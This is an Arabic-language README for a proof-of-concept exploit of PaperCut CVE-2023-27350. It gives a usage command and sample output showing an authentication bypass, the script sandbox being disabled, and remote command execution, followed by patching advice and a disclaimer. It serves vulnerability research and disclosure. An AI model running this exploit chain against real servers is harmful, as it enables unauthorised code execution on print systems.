
إثبات مفهوم لاستغلال ثغرة PaperCut CVE-2023-27350
POC لـ CVE-2023-27350 المؤثر على PaperCut MF/NG
يمكن العثور على تحليل تقني لجذر الثغرة، ومؤشرات الاختراق، والتعرض للإنترنت على مدونتنا: https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise
يستخدم هذا الـ POC ثغرة تجاوز المصادقة مقترنة بإساءة استخدام وظيفة البرمجة النصية المدمجة لتنفيذ الأكواد.
python3 CVE-2023-27350.py --url 'http://10.0.40.56:9191' --command calc.exe
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y
قم بالتحديث إلى أحدث إصدار أو خفف المخاطر باتباع التعليمات في نشرة الأمان من PaperCut
تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعالة فقط، وليس المقصود استخدامه لمهاجمة الأنظمة إلا بإذن صريح. القائمون على المشروع غير مسؤولين عن إساءة استخدام البرنامج. استخدمه بمسؤولية.